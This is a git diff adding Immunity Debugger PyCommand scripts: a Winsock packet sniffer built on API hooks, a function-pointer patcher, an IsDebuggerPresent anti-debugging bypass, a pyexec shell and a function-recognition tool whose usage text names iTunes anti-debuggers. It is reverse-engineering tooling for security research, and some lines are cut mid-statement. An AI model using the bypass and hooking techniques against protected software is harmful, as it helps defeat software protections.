+ while counter < int(length):
+ if ord(final_payload[counter]) >= 32 and ord(final_payload[counter]) <= 126:
+ payload += final_payload[counter]
+ else:
+ payload += "."
+
+ bin_payload += "%02x" % ord(final_payload[counter])
+ counter += 1
+
+ # Build the list thats table-friendly
+ log_items = [function_name, type, "%d" % int(length), bin_payload[:512], payload[:512]]
+
+ # Add the packet to the knowledgebase
+ self.imm.addKnowledge("binary_packet", bin_payload, force_add=0x1)
+ self.imm.addKnowledge("ascii_packet", payload, force_add=0x1)
+ self.imm.addKnowledge("packet_length", int(length[0]),force_add=0x1)
+
+ # Get a handle to the window and add the items, along with the related
+ # address, this is sweet cause you can double-click on a packet and
+ # see in the disassembly where it was sent/received :)
+ cap_win = self.imm.getKnowledge("cap_win")
+ cap_win.add(regs['EIP'], log_items)
+
+ #self.imm.disableBreakpoint(regs['EIP'])
+ except:
+ return False
+
+ #########################################################################
+ def extended_packet_sniff(self, regs):
+ '''
+ This is for the WSA* family of socket functions where we have to
+ do more pointer manipulation and there's a bit more work involved
+ in getting the packets.
+ '''
+
+ (payload_ptr, recv_ptr, type, function_name) = self.imm.getKnowledge("%08x" % regs['EIP'])
+
+ # This is an [out] pointer that let's us know how much data was
+ # received on a socket (non-overlapped)
+ length = self.imm.readMemory(recv_ptr, 4)
+ length = struct.unpack("l", length)
+
+ try:
+ # Network apps are chatty, we don't want to grab garbage packets
+ if length[0] > 1:
+
+ counter = 0
+ payload = ""
+ bin_payload = ""
+
+ # Get the raw packet payload and the length of the bytes
+ raw_payload = self.imm.readMemory(payload_ptr, int(length[0]))
+ pack_len = str(int(length[0]))+"c"
+
+ if raw_payload is not None:
+
+ final_payload = struct.unpack(pack_len, raw_payload)
+
+ # Iterate through the unpacked string, only outputting printable
+ # ascii characters, output the standard dots if non-printable
+ while counter < int(length[0]):
+ if ord(final_payload[counter]) >= 32 and ord(final_payload[counter]) <= 126:
+ payload += final_payload[counter]
+ else:
+ payload += "."
+
+ bin_payload += "%02x" % ord(final_payload[counter])
+ counter += 1
+
+ # Build the list thats table-friendly
+ log_items = [function_name, type, "%d" % int(length[0]), bin_payload[:512], payload[:512]]
+
+ # Add the packet to the knowledgebase
+ self.imm.addKnowledge("binary_packet", bin_payload, force_add=0x1)
+ self.imm.addKnowledge("ascii_packet", payload, force_add=0x1)
+ self.imm.addKnowledge("packet_length", int(length[0]),force_add=0x1)
+
+ # Get a handle to the window and add the items, along with the related
+ # address, this is sweet cause you can double-click on a packet and
+ # see in the disassembly where it was sent/received :)
+ cap_win = self.imm.getKnowledge("cap_win")
+ cap_win.add(regs['EIP'], log_items)
+
+ #self.imm.disableBreakpoint(regs['EIP'])
+ except:
+ return False
+#############################################################################
+class set_hooks(LogBpHook):
+
+ #########################################################################
+ def __init__(self):
+
+ LogBpHook.__init__(self)
+ self.imm = Debugger()
+
+
+ #########################################################################
+ def create_hooks(self):
+ '''
+ This creates the original hooks on the common socket receive functions,
+ this is not comprehensive but it should catch most socket operations.
+ Future enhancements will include all possible socket operations.
+ '''
+
+ ws_wsarecv = self.imm.getAddress("ws2_32.WSARecv")
+ ws_wsasend = self.imm.getAddress("ws2_32.WSASend")
+ ws_recv = self.imm.getAddress("ws2_32.recv")
+ ws_recvfrom = self.imm.getAddress("ws2_32.recvfrom")
+
+ # Set the hooks
+ current_iteration = self.imm.getKnowledge("current_iteration")
+ if current_iteration == 0:
+ self.add("WSARecv", ws_wsarecv)
+ self.add("WSASend", ws_wsasend)
+ self.add("recv", ws_recv)
+ self.add("recvfrom", ws_recvfrom)
+
+ # Register the hook-address pair with the knowledgebase
+ self.imm.addKnowledge("%08x" % ws_wsarecv, "WSARecv",force_add=0x1)
+ self.imm.addKnowledge("%08x" % ws_wsasend, "WSASend",force_add=0x1)
+ self.imm.addKnowledge("%08x" % ws_recv, "recv",force_add=0x1)
+ self.imm.addKnowledge("%08x" % ws_recvfrom, "recvfrom",force_add=0x1)
+
+ #########################################################################
+ def retrieve_packet(self, function_name, regs):
+ '''
+ This function determines how to handle the packet data. Some socket
+ operations require more work (such as WSARecv), and others less (recv).
+
+ If necessary this function will register a hook on [ESP], where any
+ [out] pointers from a function will be set.
+ '''
+
+ extended_hook = None
+
+ # Determine what function we have hooked, based on this, retrieve the packet contents
+ if function_name == "WSARecv":
+ type = PACKET_TYPE_RECV+PACKET_PROTOCOL_TCP
+ extended_hook = True
+
+ if function_name == "WSASend":
+ type=PACKET_TYPE_SEND+PACKET_PROTOCOL_TCP
+ extended_hook = True
+
+ if function_name == "recvfrom":
+ type=PACKET_TYPE_RECV+PACKET_PROTOCOL_UDP
+ extended_hook = False
+
+ if function_name =="recv":
+ type=PACKET_TYPE_RECV+PACKET_PROTOCOL_TCP
+ extended_hook = False
+
+ if extended_hook is None:
+ self.imm.addKnowledge("session", False, force_add=0x1)
+ return
+
+ # An extended hook requires a bit more work to pull out the packet info
+ if extended_hook == True:
+
+ # Get the pointer to the payload pointer :(
+ pbuffer_ptr = self.imm.readMemory(regs['ESP'] + 8, 4)
+ pbuffer_ptr = struct.unpack("L", pbuffer_ptr)
+
+ # Get the pointer to the packet payload
+ payload_ptr = self.imm.readMemory(pbuffer_ptr[0]+4, 4)
+ payload_ptr = struct.unpack("}
+
+modptr
+"""
+__VERSION__ = '1.0'
+
+DESC="""!modptr Patch all Function Pointers and detect when they triggered """
+
+
+import immlib
+import immutils
+import libdatatype
+import getopt
+from immlib import AccessViolationHook
+
+INDEXER = 0xb4000000
+INDEX_MASK = 0xFF000000
+FNDX_MASK = 0x00FFFFFF
+
+def usage(imm):
+ imm.Log("!modptr Patch all Function Pointers and detect when they triggered")
+ imm.Log("!modptr address")
+ imm.Log(" [Note: it will patch all the function pointer on the memory pages of the given address]")
+ return "Usage: !modptr ADDRESS"
+
+# Access Violation Hook class
+class FunctionTriggeredHook(AccessViolationHook):
+ def __init__( self, fn_ptr):
+ AccessViolationHook.__init__( self )
+ #self.threadid = threadid
+ self.fn_ptr = fn_ptr
+
+ # The objective of this Hook is to listen on every Access Violation until we
+ # found the access violation we force by patching every function pointer.
+ # Recognise what pointer is and show it on Log Window
+ def run(self, regs):
+ imm = immlib.Debugger()
+
+ eip = regs['EIP']
+ # Checking if we are on the correct Access Violation
+ if ( eip & INDEX_MASK ) != INDEXER:
+ return ""
+ fndx = eip & FNDX_MASK
+ if fndx >= len( self.fn_ptr ) :
+ return ""
+
+ obj = self.fn_ptr[ fndx ] # it shouldn't be out of index
+
+ # Print info and Unhook
+ imm.Log("Found a pointer at 0x%08x that triggers: " % obj.address, address = obj.address, focus =1 )
+ imm.Log(" %s: %s" % ( obj.name, obj.Print() ), address = obj.address)
+
+ imm.setReg("EIP", int(obj.data) )
+ imm.Run()
+ #self.UnHook()
+
+def main(args):
+ imm = immlib.Debugger()
+ if not args:
+ return usage(imm)
+
+ exclude = []
+ address = 0
+ try:
+ opts, argo = getopt.getopt(args, "a:x:")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Wrong Argument (Check Log Window)"
+
+ for o,a in opts:
+ if o == '-a':
+ address = int( a, 16 )
+ elif o == '-f':
+ exclude.append( int( a, 16 ) )
+
+ page = imm.getMemoryPagebyAddress( address )
+
+ if not page:
+ return "Failed to grab Memory Page, wrong addres: 0x%08x" % address
+
+ addr = page.getBaseAddress()
+ mem = imm.readMemory( page.getBaseAddress(), page.getSize() )
+ ndx = INDEXER
+ fn_ptr = []
+
+ # Discovering Function Pointers
+ dt = libdatatype.DataTypes( imm )
+ ret = dt.Discover( mem, addr, what = 'pointers' )
+ if ret:
+ for obj in ret:
+ if obj.isFunctionPointer() and obj.address not in exclude:
+ # Writing a dword that would make the Function Pointer crash on AV
+ # and later we will identify on our AV Hook
+ imm.Log( "Modifying: 0x%08x" % obj.address )
+ imm.writeLong( obj.address, ndx )
+ ndx += 1
+ fn_ptr.append( obj )
+
+ hook = FunctionTriggeredHook( fn_ptr )
+ hook.add( "modptr_%08x" % addr )
+ return "Hooking on %d Functions" % len( fn_ptr )
+ else:
+ return "No Function pointers found on the page of 0x%08x" % address
+
+
diff --git a/1.73/PyCommands/nohooks.py b/1.73/PyCommands/nohooks.py
new file mode 100755
index 0000000..fdc1538
--- /dev/null
+++ b/1.73/PyCommands/nohooks.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+"""
+
+nohooks
+
+"""
+
+__VERSION__ = '0.1'
+
+DESC="""Clean all hooks from memory"""
+
+import immlib
+
+def main(args):
+ imm = immlib.Debugger()
+ for hook in imm.listHooks():
+ imm.removeHook(hook)
+ imm.Log("Removed \"%s\" hook from memory" % str(hook))
+ return "Hooks removed"
diff --git a/1.73/PyCommands/openfile.py b/1.73/PyCommands/openfile.py
new file mode 100755
index 0000000..a60a94e
--- /dev/null
+++ b/1.73/PyCommands/openfile.py
@@ -0,0 +1,33 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+openfile example
+
+"""
+
+__VERSION__ = '1.0'
+
+DESC="""Open a File"""
+
+import immlib
+
+def usage(imm):
+ imm.Log("!openfile file")
+ imm.Log("ex: !openfile c:\\boot.ini", focus=1)
+
+def main(args):
+ imm=immlib.Debugger()
+ if not args:
+ usage(imm)
+ return "Wrong Arguments (Check Log Windows for the usage information)"
+ ret = imm.openTextFile( args[0] )
+ if ret == 0:
+ return "File %s open" % args[0]
+ else:
+ return "Cannot open %s" % args[0]
+
diff --git a/1.73/PyCommands/packets.py b/1.73/PyCommands/packets.py
new file mode 100755
index 0000000..487842a
--- /dev/null
+++ b/1.73/PyCommands/packets.py
@@ -0,0 +1,276 @@
+import socket
+import struct
+
+from immlib import *
+
+
+DESC="""Creates a table that displays packets received on the network."""
+
+#############################################################################
+'''
+Some defines for re-use.
+'''
+PACKET_TYPE_SEND = "Send "
+PACKET_TYPE_RECV = "Recv "
+PACKET_PROTOCOL_UDP = "(UDP)"
+PACKET_PROTOCOL_TCP = "(TCP)"
+
+
+#############################################################################
+class simple_hooks(LogBpHook):
+
+ #########################################################################
+ def __init__(self):
+ LogBpHook.__init__(self)
+
+
+ #########################################################################
+ def run(self,regs):
+
+ imm = Debugger()
+
+ (payload_ptr,type,function_name) = imm.getKnowledge("%08x" % regs['EIP'])
+
+ # The length is stored as a function return argument, so let's read EAX
+ length = regs['EAX']
+
+
+ # Because return codes can be -1 (error) we have to test for that.
+ if length > 1 and length != 0xffffffff:
+
+ counter = 0
+ payload = ""
+ bin_payload = ""
+
+ # Get the raw packet payload and the length of the bytes
+ raw_payload = imm.readMemory(payload_ptr,length)
+
+
+
+ pack_len = str(length)+"c"
+ imm.Log("Pack Len: %s " % pack_len)
+ if raw_payload is not None:
+
+ final_payload = struct.unpack(pack_len,raw_payload)
+
+ # Iterate through the unpacked string, only outputting printable
+ # ascii characters, output the standard dots if non-printable
+ while counter < int(length):
+ if ord(final_payload[counter]) >= 32 and ord(final_payload[counter]) <= 126:
+ payload += final_payload[counter]
+ else:
+ payload += "."
+
+ bin_payload += "%02x" % ord(final_payload[counter])
+ counter += 1
+
+ # Build the list thats table-friendly
+ log_items = [function_name,type,"%d" % int(length),bin_payload[:512],payload[:512]]
+
+ # Get a handle to the window and add the items, along with the related
+ # address, this is sweet cause you can double-click on a packet and
+ # see in the disassembly where it was sent/received :)
+ cap_win = imm.getKnowledge("cap_win")
+ cap_win.add(regs['EIP'],log_items)
+
+ # Drop the entry in the KB, disable the BP, and unHook.
+ imm.forgetKnowledge("%08x" % regs['EIP'])
+ imm.disableBreakpoint(regs['EIP'])
+ self.UnHook()
+
+
+#############################################################################
+class ext_hooks(LogBpHook):
+
+
+ #########################################################################
+ def __init__(self):
+ LogBpHook.__init__(self)
+
+
+ #########################################################################
+ def run(self,regs):
+
+ imm = Debugger()
+
+ (payload_ptr,recv_ptr,type,function_name) = imm.getKnowledge("%08x" % regs['EIP'])
+
+ # This is an [out] pointer that let's us know how much data was
+ # received on a socket (non-overlapped)
+ length = imm.readMemory(recv_ptr,4)
+ length = struct.unpack("l",length)
+
+ # Network apps are chatty, we don't want to grab garbage packets
+ if length[0] > 1:
+
+ counter = 0
+ payload = ""
+ bin_payload = ""
+
+ # Get the raw packet payload and the length of the bytes
+ raw_payload = imm.readMemory(payload_ptr,int(length[0]))
+ pack_len = str(int(length[0]))+"c"
+
+ if raw_payload is not None:
+
+ final_payload = struct.unpack(pack_len,raw_payload)
+
+ # Iterate through the unpacked string, only outputting printable
+ # ascii characters, output the standard dots if non-printable
+ while counter < int(length[0]):
+ if ord(final_payload[counter]) >= 32 and ord(final_payload[counter]) <= 126:
+ payload += final_payload[counter]
+ else:
+ payload += "."
+
+ bin_payload += "%02x" % ord(final_payload[counter])
+ counter += 1
+
+ # Build the list thats table-friendly
+ log_items = [function_name,type,"%d" % int(length[0]),bin_payload[:512],payload[:512]]
+
+ # Get a handle to the window and add the items, along with the related
+ # address, this is sweet cause you can double-click on a packet and
+ # see in the disassembly where it was sent/received :)
+ cap_win = imm.getKnowledge("cap_win")
+ cap_win.add(regs['EIP'],log_items)
+
+
+ # Drop the entry in the KB, disable the BP, and unHook.
+ imm.forgetKnowledge("%08x" % regs['EIP'])
+ imm.disableBreakpoint(regs['EIP'])
+ self.UnHook()
+
+
+#############################################################################
+class set_hooks(LogBpHook):
+ def __init__(self):
+ LogBpHook.__init__(self)
+
+ #########################################################################
+ def run(self,regs):
+ '''
+ This routine is the first one hit, when a socket operation occurs.
+ '''
+ imm = Debugger()
+
+
+ # Retrieve the function name
+ function_name = imm.getKnowledge("%08x" % regs['EIP'])
+
+ self.retrieve_packet(imm,function_name,regs)
+
+
+ #########################################################################
+ def retrieve_packet(self,imm,function_name,regs):
+ '''
+ This function determines how to handle the packet data. Some socket
+ operations require more work (such as WSARecv), and others less (recv).
+
+ If necessary this function will register a hook on [ESP], where any
+ [out] pointers from a function will be set.
+ '''
+
+ # Determine what function we have hooked, based on this, retrieve the packet contents
+ if function_name == "WSARecv":
+ type = PACKET_TYPE_RECV+PACKET_PROTOCOL_TCP
+ extended_hook = True
+
+ if function_name == "WSASend":
+ type=PACKET_TYPE_SEND+PACKET_PROTOCOL_TCP
+ extended_hook = True
+
+ if function_name == "recvfrom":
+ type=PACKET_TYPE_RECV+PACKET_PROTOCOL_UDP
+ extended_hook = False
+
+ if function_name =="recv":
+ type=PACKET_TYPE_RECV+PACKET_PROTOCOL_TCP
+ extended_hook = False
+
+ # An extended hook requires a bit more work to pull out the packet info
+ if extended_hook == True:
+
+ # Get the pointer to the payload pointer :(
+ pbuffer_ptr = imm.readMemory( regs['ESP'] + 8, 4)
+ pbuffer_ptr = struct.unpack("L", pbuffer_ptr)
+ #imm.Log("Buffer Location: 0x%08x" % pbuffer_ptr[0])
+
+ # Get the pointer to the packet payload
+ payload_ptr = imm.readMemory(pbuffer_ptr[0]+4,4)
+ payload_ptr = struct.unpack("}
+"""
+
+__VERSION__ = '1.1'
+
+NOTES="""
+anti-antidebugging is here
+
+DONE: IsDebuggerPresent
+TODO:
+* EnumProcesses
+* CreateToolhelp32Snapshot, Process32First, Process32Next,
+* UnhandeldExceptionFilter - ZwQueryInformationProcess
+* ProcessHeapFlag & NTGlobalFlag
+"""
+
+import immlib
+from immlib import BpHook
+import getopt
+
+DESC="Patches anti-debugging protection , [-t TYPE_OF_PROTECTION]"
+
+def usage(imm):
+ imm.Log("!patch -t TYPE",focus=1)
+
+def main(args):
+ types={"isdebuggerpresent": 0}
+ imm = immlib.Debugger()
+
+ if not args:
+ return "give patch type..."
+
+
+ try:
+ opts, argo = getopt.getopt(args, "t:s")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Bad patch argument %s" % args[0]
+
+ type = None
+
+ for o,a in opts:
+ if o == '-t':
+ low = a.lower()
+ if types.has_key( low ):
+ type = types[ low ]
+ else:
+ return "Invalid type: %s" % a
+
+
+ # IsDebuggerPresent
+ if type == 0:
+ imm.Log( "Patching IsDebuggerPresent..." )
+ ispresent = imm.getAddress( "kernel32.IsDebuggerPresent" )
+ imm.writeMemory( ispresent, imm.Assemble( "xor eax, eax\n ret" ) )
+
+ return "IsDebuggerPresent patched"
+
+ else:
+ usage(imm)
+ return "Bad patch argument"
+
\ No newline at end of file
diff --git a/1.73/PyCommands/pycmd.py b/1.73/PyCommands/pycmd.py
new file mode 100755
index 0000000..b320534
--- /dev/null
+++ b/1.73/PyCommands/pycmd.py
@@ -0,0 +1,83 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+Pycommand example
+
+"""
+
+__VERSION__ = '1.0'
+
+DESC="""PyCommands example - Params: arg1 arg2"""
+
+import immlib
+import immutils
+
+import time
+
+def get_time_1():
+ start = time.clock()
+ stop = time.clock()
+ duration = (stop - start ) * 1000
+ return duration
+
+def main(args):
+ imm=immlib.Debugger()
+ for arg in args:
+ imm.Log("Arg: %s" % arg)
+
+ mod = imm.getModule("ntdll.dll")
+ addr = mod.getCodebase()
+ dec = imm.findDecode( addr )
+ imm.Log("Base address: 0x%08x" % addr)
+ address = 0x7c93c667
+ imm.Log( hex(address ) )
+ imm.Log( str( dec.isJmpDestination( address ) ) )
+ imm.Log( hex( dec[ address ] ) )
+ #op = imm.disasmCode( address ) # 0.55
+ #op = imm.Disasm( address ) # 0.83
+ #op = imm.disasmData( address ) # 0.83
+ #op = imm.disasmSizeOnly( address )
+
+ #import profile
+
+ #foo = imm.disasmFile
+ import time
+
+ start = time.clock()
+ op = imm.disasmData( address ) # 0.27
+ stop = time.clock()
+ imm.Log("DisasmData %.8f usec/pass" % (stop-start) )
+
+
+ imm.Log( "is jmc" + str( op.isConditionalJmp() ) , address = address )
+ imm.Log( "op dest: 0x%08x" % op.getJmpConst(), address = address )
+ address += 1
+ imm.Log( str(immutils.hexdump( dec.data )) )
+ #ADDR = 0x7C9139ED
+ #ADDR = 0x7C91D37F # 16
+ #ADDR = 0x7C920645 # 17
+ #ADDR = 0x7C9206BB
+ #ADDR = 0x7C923313 # 21
+ #ADDR = 0x7C925D96 # 39
+ #ADDR = 0x7C9260BCL # 36
+ #import libanalize
+ ADDR = 0x7C9105D4L
+
+ f = imm.getFunction( ADDR )
+ bb = f.getBasicBlocks()
+ imm.Log("Basic Blocks")
+ ida = [0x7c911f49,0x7c93bad1,0x7c911505,0x7c9112f2,0x7c93431e,0x7c9111f1,0x7c9342c5,0x7c9111f6,0x7c91b298,0x7c912221,0x7c911513,0x7c912270,0x7c912343,0x7c93250b,0x7c9114cf,0x7c9115ad,0x7c910c98,0x7c911566,0x7c93b95e,0x7c9116ff,0x7c931a9a,0x7c9342e9,0x7c934312,0x7c910c91,0x7c911441,0x7c911446,0x7c91122e,0x7c91b2a2,0x7c911330,0x7c9113b0,0x7c9117e4,0x7c931ad8,0x7c93b968,0x7c910cd3,0x7c93ba0c,0x7c9111a2,0x7c91222b,0x7c932508,0x7c911790,0x7c93bac9,0x7c911182,0x7c912237,0x7c910649,0x7c912230,0x7c93b89a,0x7c93bbd6,0x7c934278,0x7c911624,0x7c93ba89,0x7c9111fe,0x7c934341,0x7c911676,0x7c911573,0x7c934256,0x7c931a8c,0x7c9342a5,0x7c911570,0x7c93ba01,0x7c91154b,0x7c910cec,0x7c93bc5e,0x7c911342,0x7c934356,0x7c9113f0,0x7c91117a,0x7c910c9f,0x7c912269,0x7c934391,0x7c910ca6,0x7c93b91a,0x7c934302,0x7c934351,0x7c911fe5,0x7c9106a5,0x7c911193,0x7c911615,0x7c9112ca,0x7c911541,0x7c911815,0x7c9115fa,0x7c912243,0x7c93bbe2,0x7c934386,0x7c934380,0x7c9342ce,0x7c91142e,0x7c93437b,0x7c93b999,0x7c91176c,0x7c9115ba,0x7c911633,0x7c91062d,0x7c91153b,0x7c91067b,0x7c9106ab,0x7c93b994,0x7c93430c,0x7c9111e9,0x7c9112c4,0x7c9113a6,0x7c911fe8,0x7c93bc68,0x7c910cab,0x7c934396,0x7c911555,0x7c93bb49,0x7c934314,0x7c9114e5,0x7c93b8d5,0x7c934370,0x7c93bc25,0x7c911764,0x7c910cfa,0x7c934375,0x7c912254,0x7c9116d3,0x7c910625,0x7c911c58,0x7c93bbed,0x7c93bbb4,0x7c9105e3,0x7c93bc59,0x7c93ba63,0x7c93ba99,0x7c93ba66,0x7c9324c7,0x7c93438b,0x7c91182c,0x7c9111b1,0x7c9113b8,0x7c911487,0x7c9115d3,0x7c911484,0x7c91170a,0x7c910cc8,0x7c93b922,0x7c93bb56,0x7c9113ce,0x7c93bb50,0x7c9115ed,0x7c9113fe,0x7c93bc11,0x7c911c65,0x7c910638,0x7c9116c8,0x7c912388,0x7c912260,0x7c911239,0x7c934368,0x7c9324ec,0x7c9105d4,0x7c91130f,0x7c93b99e,0x7c91237a,0x7c91138c,0x7c934280,0x7c9116bf,0x7c931aad,0x7c911f8e,0x7c911414,0x7c911525,0x7c9343a3,0x7c911c6b,0x7c910fdc,0x7c93b9db,0x7c911f8a,0x7c9106d7,0x7c93bc1c,0x7c910687,0x7c911439,0x7c9111bb,0x7c911f77,0x7c910660,0x7c93428c,0x7c911c76,0x7c9115df,0x7c93b8a2,0x7c93bc9d,0x7c911382,0x7c911538,0x7c910609,0x7c93bbcd,0x7c931aa5,0x7c9342d3,0x7c911784,0x7c911309,0x7c93436a,0x7c911c83,0x7c91140b,0x7c91149e,0x7c93b92f,0x7c9117ae,0x7c93439d,0x7c91137a,0x7c9324e1,0x7c93b9ac,0x7c93b8cb,0x7c9106e4,0x7c9106e6,0x7c93268f,0x7c93bb16,0x7c934349,0x7c93b88e,0x7c911f7f,0x7c9113ed,0x7c9115c4,0x7c91b28c,0x7c91159a,0x7c93b9b2,0x7c911588,0x7c9117c5,0x7c91165f,0x7c9117dd,0x7c931ab4,0x7c911394,0x7c910618,0x7c9116a8,0x7c911fbd,0x7c93bb8b,0x7c911503,0x7c911501,0x7c91066e,0x7c911792,0x7c931acb,0x7c911158,0x7c910fca,0x7c93ba38,0x7c91179c,0x7c911315,0x7c910cb6,0x7c91185e,0x7c910c67,0x7c911c8c,0x7c910c61,0x7c93bb3e,0x7c93b883,0x7c91220d,0x7c93b9de,0x7c93bae5,0x7c911596,0x7c9106b8,0x7c9114a7,0x7c93b8c0,0x7c9113dc,0x7c93bb37,0x7c9115c0,0x7c911645,0x7c9106eb,0x7c912356,0x7c93ba3e,0x7c910666,0x7c9122dc,0x7c931ac1,0x7c93b903,0x7c9324fe,0x7c911241,0x7c93b953,0x7c910744,0x7c93b90e,0x7c931a6b,0x7c91139e,0x7c911253,0x7c911324,0x7c9122e8,0x7c911320,0x7c9115a4]
+ for a in bb:
+ imm.Log(" (0x%08x, 0x%08x )" % (a[0], a[1]) )
+ del ida[ ida.index( a[0] ) ]
+ imm.Log("BB size: %d" % len(bb) )
+ imm.Log("Resto: %d" % len(ida) )
+ for a in ida:
+ op = imm.disasmBackward(a)
+
+ imm.Log(" -> 0x%08x %s" % (a, str(op.isCall())), address = a)
diff --git a/1.73/PyCommands/pyexec.py b/1.73/PyCommands/pyexec.py
new file mode 100755
index 0000000..691f646
--- /dev/null
+++ b/1.73/PyCommands/pyexec.py
@@ -0,0 +1,34 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+__VERSION__ = '1.0'
+
+import immlib, string
+import traceback
+import sys
+
+DESC = "Non interactive python shell [immlib already imported]"
+
+def usage(imm):
+ imm.Log("!pyexec code")
+
+def main(args):
+ imm = immlib.Debugger()
+ if args:
+ commands = string.joinfields(args, "")
+ try:
+ exec commands
+ except:
+ error = traceback.format_exception_only(sys.exc_type, sys.exc_value)
+ imm.Log("Error on: %s" % commands, focus = 1)
+ for line in error: # Its just one line anyways, for format_exception_only
+ line = line.strip()
+ imm.Log(line)
+ return line
+ else:
+ return "No python command given"
diff --git a/1.73/PyCommands/recognize.py b/1.73/PyCommands/recognize.py
new file mode 100755
index 0000000..5fe1b28
--- /dev/null
+++ b/1.73/PyCommands/recognize.py
@@ -0,0 +1,226 @@
+"""
+recognize.py - Function Recongnizing using heuristic patterns.
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+
+__VERSION__ = '1.0'
+import immlib
+import immutils
+import getopt
+import string
+import os
+import csv
+from librecognition import *
+
+DESC="Function Recognizing using heuristic patterns."
+
+def usage(imm):
+ imm.Log("!recognize -{a|m} -n name [ -x address ] [ -i filename ] [-v version/extra]")
+ imm.Log("!recognize -d [ -i filename ] -n name")
+ imm.Log("!recognize -l [-i filename] [-n name]")
+ imm.Log("!recognize -f -n name [-i filename] [-v version/extra] [-o module] [-h heuristic_threasold]")
+ imm.Log("!recognize -r -x address [-i filename] [-h heuristic_threasold]")
+ imm.Log(" ex (find a pattern, accept 80%% of match): !recognize -f -n iTunes.AntiDebuggers -h 80 -o iTunes.exe")
+ imm.Log(" ex (resolv an address, accept 93%% of match): !recognize -r -x 004EDE00 -h 93")
+ imm.Log(" ex (add a pattern): !recognize -a -x 004EDE00 -n iTunes.AntiDebuggers -i itunes.dat -v 7.4.1")
+ imm.Log(" ex (add a pattern guessing the address from labels or symbols): !recognize -a -n _SPExternalAlloc@4")
+ imm.Log(" ex (modify a pattern): !recognize -m -x 004EDE00 -n iTunes.AntiDebuggers -i itunes.dat -v protections_disabled")
+ imm.Log(" ex (delete a pattern): !recognize -d -i itunes.dat -n iTunes.AntiDebuggers")
+ imm.Log(" ex (list patterns): !recognize -l -i itunes.dat -n antidebug", focus=1)
+ return ""
+
+def main(args):
+ imm = immlib.Debugger()
+
+ imm.Log("################# Immunity's Function Recognizing ################")
+ imm.markBegin()
+
+ if not args:
+ usage(imm)
+ return "not enough args"
+
+ try:
+ opts, notused = getopt.getopt(args, "amdlfrx:n:i:h:v:o:")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ defaultfilename = os.path.join("Data", "default.dat")
+ name = address = id = action = module = filename = None
+ version = ""
+ heuristic = 90
+ for o,a in opts:
+ if o == '-x':
+ address = imm.getAddress(a)
+ if address < 0:
+ imm.Log("invalid address or expresion")
+ usage(imm)
+ return "address error!"
+ if o == '-o':
+ module = a
+ if o == '-n':
+ name = string.strip(a, " '\"\\{}%;,")
+ if o == "-i":
+ filename = os.path.basename(string.strip(a, " '\"{}%;,"))+".dat"
+ if not filename:
+ usage(imm)
+ return "invalid filename"
+ filename = os.path.join("Data",filename)
+ if o == '-v':
+ version = string.strip(a, " '\"\\{}%;,")
+ if o == "-h":
+ try:
+ heuristic = int(a)
+ except:
+ imm.Log("invalid heuristic threasold")
+ usage(imm)
+ return "heuristic theashold error!"
+ if o in ["-a","-m","-d","-l","-f","-r"]:
+ action = o[1]
+
+ if not action:
+ usage(imm)
+ return "no action set"
+
+ #add/modify an element
+ if action == "a" or action == "m":
+ if not filename: filename = defaultfilename
+ if not name:
+ usage(imm)
+ return "insufficient arguments to add/modify an entry"
+
+ if not address:
+ tmp = imm.getAddressOfExpression(name)
+ if tmp > 0:
+ address = tmp
+ else:
+ return "name hasn't a known address"
+
+ modif = False
+ recon = FunctionRecognition(imm, filename)
+ for d in recon.dictionaries:
+ if name == d[0]:
+ if action == "a":
+ usage(imm)
+ return "the name '%s' is already in the selected dictionary" % name
+ if action == "m":
+ modif = True
+ break
+ if action == "m" and not modif:
+ usage(imm)
+ return "the name '%s' wasn't found in the selected dictionary" % name
+
+ tmp = recon.makeFunctionHash(address, compressed=True)
+ file = extractFile(imm, address)
+ definition = [ name, tmp[0], tmp[1][0], tmp[1][1], tmp[2], version, file, string.join(tmp[3],"|") ]
+ remakeDictionary(imm, recon, filename, definition, action)
+ imm.Log("Element '%s' added/modified" % name, focus=1)
+
+ #delete an element
+ if action == "d":
+ if not name:
+ usage(imm)
+ return "incomplete information to delete an element"
+ if not filename: filename = defaultfilename
+ delete = False
+ recon = FunctionRecognition(imm, filename)
+ for d in recon.dictionaries:
+ if name == d[0]:
+ delete = True
+ break
+ if not delete:
+ usage(imm)
+ return "the function '%s' wasn't found in the selected dictionary" % name
+ remakeDictionary(imm, recon, filename, name, action)
+ imm.Log("Element '%s' deleted" % name, focus=1)
+
+ #list elements
+ if action == "l":
+ recon = FunctionRecognition(imm, filename)
+ list = []
+ for values in recon.dictionaries:
+ if not name or name.lower() in values[0].lower():
+ list.append([values[0],values[5],values[6],values[4], os.path.basename(values[-1])[:-4]])
+ if not list:
+ return "the name '%s' wasn't found in the dictionaries" % name
+ else:
+ imm.Log("-" * 156)
+ imm.Log("|%-30s|%-40s|%-20s|%-40s|%-20s|" % ("real name","version/extra","binary file","SHA1","repository"))
+ imm.Log("-" * 156)
+ for v in list:
+ imm.Log("|%-30s|%-40s|%-20s|%-40s|%-20s|" % (v[0][0:30],v[1][0:40],v[2][0:20],v[3][0:40], v[4][0:20]), focus=1)
+ imm.Log("-" * 156)
+
+ #search for an element
+ if action == "f":
+ if not name:
+ usage(imm)
+ return "incomplete information to search"
+
+ #we need to maintain separated csv indexes
+ dict = FunctionRecognition(imm, filename)
+ recon = FunctionRecognition(imm, filename)
+ addy = None
+ for values in dict.dictionaries:
+ if name.lower() in values[0].lower():
+ tmp = recon.searchFunctionByName(values[0], heuristic, module, version)
+ if tmp:
+ for addy,heu in tmp:
+ imm.Log("Function '%s' address: %08X (%d%%)" % (values[0], addy,heu), addy, focus=1)
+ if addy:
+ imm.gotoDisasmWindow(addy)
+ else:
+ imm.Log("We can't find a function that fullfit all the requirements", focus=1)
+
+ #resolv an address to a function name
+ if action == "r":
+ if not address:
+ usage(imm)
+ return "we need an address to resolv"
+
+ recon = FunctionRecognition(imm, filename)
